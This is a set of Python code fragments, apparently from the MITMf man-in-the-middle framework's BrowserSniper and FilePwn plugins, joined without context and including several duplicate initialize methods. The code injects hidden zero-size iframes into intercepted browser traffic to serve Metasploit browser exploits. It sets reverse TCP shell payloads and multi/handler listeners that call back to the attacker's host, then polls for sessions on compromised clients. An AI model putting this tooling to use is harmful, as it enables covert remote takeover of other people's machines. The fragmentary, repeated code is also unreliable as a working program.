def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions #inject iframe mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip)) self.html_payload = inject_payload #temporarily changes the code that the Browserprofiler plugin injects #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds #Will also make sure the shell actually came from the box that we targeted mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip)) poll_n = 1 msf = Msf() while poll_n != 30: if msf.sessionsfrompeer(ip): mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip)) self.sploited_ips.append(ip) self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped self.html_payload = self.get_payload() # restart the BrowserProfiler plugin return poll_n += 1 sleep(2) mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
def snipe(self): while True: if self.output: vic_ip = self.output['ip'] msfport = self.config['MITMf']['Metasploit']['msfport'] exploits = self.getExploits() if not exploits: if vic_ip not in self.sploited_ips: mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip)) self.sploited_ips.append(vic_ip) self.black_ips = self.sploited_ips elif exploits and (vic_ip not in self.sploited_ips): mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits))) inject_payload = '' msf = Msf() for exploit in exploits: pid = msf.findpid(exploit) if pid: mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit inject_payload += "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>".format(self.msfip, msfport, url) else: url, port = self._setupExploit(exploit, msfport) inject_payload += "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>".format(self.msfip, port, url) self.injectAndPoll(vic_ip, inject_payload) sleep(1)
def setupMSF(self): msf = Msf() for config in [ self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64 ]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) cmd += "set LHOST {}\n".format(config["HOST"]) cmd += "set LPORT {}\n".format(config["PORT"]) cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" pid = msf.findpid('multi/handler') if pid: info = msf.jobinfo(pid) if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and ( info['datastore']['LPORT'] == config["PORT"]) and ( info['datastore']['lhost'] != config['HOST']): msf.killjob(pid) msf.sendcommand(cmd) else: msf.sendcommand(cmd) else: msf.sendcommand(cmd)
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.patched = multiprocessing.Queue() from core.msfrpc import Msf self.msf = Msf() self.binaryMimeType = {'mimes': ['application/octet-stream', 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream', 'application/x-executable', 'application/x-dosexec']} self.zipType = {'mimes': ['application/x-zip-compressed', 'application/zip'], 'params': {'type': 'ZIP', 'format': 'zip', 'filter': None}} # .zip self.gzType = {'mimes': ['application/gzip', 'application/x-gzip', 'application/gnutar'], 'params': {'type': 'TAR', 'format': 'ustar', 'filter': 'gzip'}} # .gz self.tarType = {'mimes': ['application/x-tar'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': None}} # .tar self.bzType = {'mimes': ['application/x-bzip2', 'application/x-bzip'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': 'bzip2'}} # .bz / .bz2 self.archiveTypes = [self.zipType, self.gzType, self.tarType, self.bzType] #FilePwn options self.set_config() self.parse_target_config(self.user_config['targets']['ALL']) self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version)) t = threading.Thread(name='setup_msf', target=self.setup_msf) t.setDaemon(True) t.start()
def initialize(self, options): self.options = options self.msfip = SystemConfig.getIP(options.interface) self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) msfversion = Msf().version() self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
def initialize(self, options): self.options = options self.msfip = options.ip self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) from core.msfrpc import Msf self.msf = Msf() self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version)) t = threading.Thread(name='sniper', target=self.snipe) t.setDaemon(True) t.start()
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.patched = multiprocessing.Queue() #FOR FUTURE USE self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] #FOR FUTURE USE self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] #USED NOW self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, 'pe': {'number': 'MZ', 'offset': 0}, 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, 'bz': {'number': 'BZ', 'offset': 0}, 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, 'tar': {'number': 'ustar', 'offset': 257}, 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, } #NOT USED NOW #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #FilePwn options self.userConfig = self.config['FilePwn'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] msfversion = Msf().version() self.tree_info.append("Connected to Metasploit v{}".format(msfversion)) t = threading.Thread(name='setupMSF', target=self.setupMSF) t.setDaemon(True) t.start()
def _setupExploit(self, exploit, msfport): rand_url = self._genRandURL() rand_port = self._getRandPort() #generate the command string to send to the virtual console #new line character very important as it simulates a user pressing enter cmd = "use exploit/{}\n".format(exploit) cmd += "set SRVPORT {}\n".format(msfport) cmd += "set URIPATH {}\n".format(rand_url) cmd += "set PAYLOAD generic/shell_reverse_tcp\n" cmd += "set LHOST {}\n".format(self.msfip) cmd += "set LPORT {}\n".format(rand_port) cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" Msf().sendcommand(cmd) return (rand_url, rand_port)
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.patched = multiprocessing.Queue() from core.msfrpc import Msf self.msf = Msf() #FOR FUTURE USE self.binaryMimeTypes = [ "application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream' ] #FOR FUTURE USE self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] #USED NOW self.magicNumbers = { 'elf': { 'number': '7f454c46'.decode('hex'), 'offset': 0 }, 'pe': { 'number': 'MZ', 'offset': 0 }, 'gz': { 'number': '1f8b'.decode('hex'), 'offset': 0 }, 'bz': { 'number': 'BZ', 'offset': 0 }, 'zip': { 'number': '504b0304'.decode('hex'), 'offset': 0 }, 'tar': { 'number': 'ustar', 'offset': 257 }, 'fatfile': { 'number': 'cafebabe'.decode('hex'), 'offset': 0 }, 'machox64': { 'number': 'cffaedfe'.decode('hex'), 'offset': 0 }, 'machox86': { 'number': 'cefaedfe'.decode('hex'), 'offset': 0 }, } #NOT USED NOW self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #FilePwn options self.userConfig = self.config['FilePwn'] self.hostblacklist = self.userConfig['hosts']['blacklist'] self.hostwhitelist = self.userConfig['hosts']['whitelist'] self.keysblacklist = self.userConfig['keywords']['blacklist'] self.keyswhitelist = self.userConfig['keywords']['whitelist'] self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] self.parse_target_config(self.userConfig['targets']['ALL']) self.tree_info.append("Connected to Metasploit v{}".format( self.msf.version)) t = threading.Thread(name='setup_msf', target=self.setup_msf) t.setDaemon(True) t.start()